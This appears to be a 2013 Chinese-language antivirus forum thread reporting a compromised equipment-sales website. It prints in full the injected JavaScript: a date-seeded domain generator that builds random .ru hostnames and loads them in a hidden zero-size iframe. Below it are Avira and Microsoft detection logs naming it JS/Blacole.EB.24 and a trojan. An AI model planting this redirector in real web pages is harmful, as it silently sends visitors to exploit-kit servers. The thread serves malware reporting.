裏面

fireold

1. http://www.usedlabequipment.ca/MT-900-Motorized-Precision-Microtome.html

复制代码

1. function nextRandomNumber() {
   
2.     var hi = this.seed / this.Q;
   
3.     var lo = this.seed % this.Q;
   
4.     var test = this.A * lo - this.R * hi;
   
5.     if (test > 0) {
   
6.         this.seed = test;
   
7.     } else {
   
8.         this.seed = test + this.M;
   
9.     }
   
10.     return (this.seed * this.oneOverM);
    
11. }
    
12. 
    
13. function RandomNumberGenerator(unix) {
    
14.     var d = new Date(unix * 1000);
    
15.     var s = d.getHours() > 12 ? 1 : 0;
    
16.     this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math.round(s * 0xFFF));
    
17.     this.A = 48271;
    
18.     this.M = 2147483647;
    
19.     this.Q = this.M / this.A;
    
20.     this.R = this.M % this.A;
    
21.     this.oneOverM = 1.0 / this.M;
    
22.     this.next = nextRandomNumber;
    
23.     return this;
    
24. }
    
25. 
    
26. function createRandomNumber(r, Min, Max) {
    
27.     return Math.round((Max - Min) * r.next() + Min);
    
28. }
    
29. 
    
30. function generatePseudoRandomString(unix, length, zone) {
    
31.     var rand = new RandomNumberGenerator(unix);
    
32.     var letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'];
    
33.     var str = '';
    
34.     for (var i = 0; i < length; i++) {
    
35.         str += letters[createRandomNumber(rand, 0, letters.length - 1)];
    
36.     }
    
37.     return str + '.' + zone;
    
38. }
    
39. 
    
40. setTimeout(function() {
    
41.     try {
    
42.         if (typeof iframeWasCreated == "undefined") {
    
43.             iframeWasCreated = true;
    
44.             var unix = Math.round(+new Date() / 1000);
    
45.             var domainName = generatePseudoRandomString(unix, 16, 'ru');
    
46.             ifrm = document.createElement("IFRAME");
    
47.             ifrm.setAttribute("src", "http://" + domainName + "/runforestrun?sid=botnet2");
    
48.             ifrm.style.width = "0px";
    
49.             ifrm.style.height = "0px";
    
50.             ifrm.style.visibility = "hidden";
    
51.             document.body.appendChild(ifrm);
    
52.         }
    
53.     } catch (e) {}
    
54. }, 500);

复制代码

1. j % 2

复制代码

Avira

2013/9/20 上午 11:21 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\A1VVYTC4\mootools[1].js'
      包含病毒或有害的程式 'JS/Blacole.EB.24' [virus]
      已採取動作：
      檔案會移動至 '55451001.qua' 名稱底下的隔離區目錄。.

2013/9/20 上午 11:21 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數：        780
      目錄數：        0
      惡意程式碼數：        1
      警告數：        0

2013/9/20 上午 11:20 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\A1VVYTC4\mootools[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.24 [virus]'
      執行的動作：傳輸至掃描程式

2013/9/20 上午 11:20 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\A1VVYTC4\mootools[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.24 [virus]'
      執行的動作：拒絕存取

2013/9/20 上午 11:20 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\GP9UHU8J\ja.script[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.24 [virus]'
      執行的動作：拒絕存取

2013/9/20 上午 11:20 [Web Protection] 發現惡意程式碼
      從 URL "http://www.usedlabequipment.ca/media/system/js/mootools.js" 存取資料時，
      發現病毒或有害的程式 'JS/Blacole.EB.24' [virus]。
      已採取動作：已略過

2013/9/20 上午 11:20 [Web Protection] 發現惡意程式碼
      從 URL "http://www.usedlabequipment.ca/templates/ja_zeolite/js/ja.script.js"
      存取資料時，
      發現病毒或有害的程式 'JS/Blacole.EB.24' [virus]。
      已採取動作：已略過

墨家小子

类别: 特洛伊木马

描述: 这个程序很危险，而且执行来自攻击者的命令。

推荐的操作: 立即删除这个软件。

项目:
file:C:\Users\S\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\CZE1GGEM\index[1].php
file:C:\Users\S\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\CZE1GGEM\index[2].php

联机获取此项的详细信息。

墨家小子

类别: 特洛伊木马

描述: 这个程序很危险，而且执行来自攻击者的命令。

推荐的操作: 立即删除这个软件。

项目:
file:C:\Users\S\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8DOAYD7Q\ja.script[1].js
file:C:\Users\S\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DK1AXNSL\mootools[1].js

联机获取此项的详细信息。

fireold

墨家小子 发表于 2013-9-20 13:18
类别: 特洛伊木马

描述: 这个程序很危险，而且执行来自攻击者的命令。

哈！哈！連發二帖了...

墨家小子

fireold 发表于 2013-9-20 13:31
哈！哈！連發二帖了...

很多拦截记录 不知道是那个

fireold

墨家小子 发表于 2013-9-20 13:32
很多拦截记录 不知道是那个

不管，還是要認錯道歉…否則檢舉你

墨家小子

fireold 发表于 2013-9-20 13:36
不管，還是要認錯道歉…否則檢舉你

客官 不可以

fireold

墨家小子 发表于 2013-9-20 13:36
客官 不可以

好吧！那就放你一馬

墨家小子

fireold 发表于 2013-9-20 13:45
好吧！那就放你一馬

谢谢大帅锅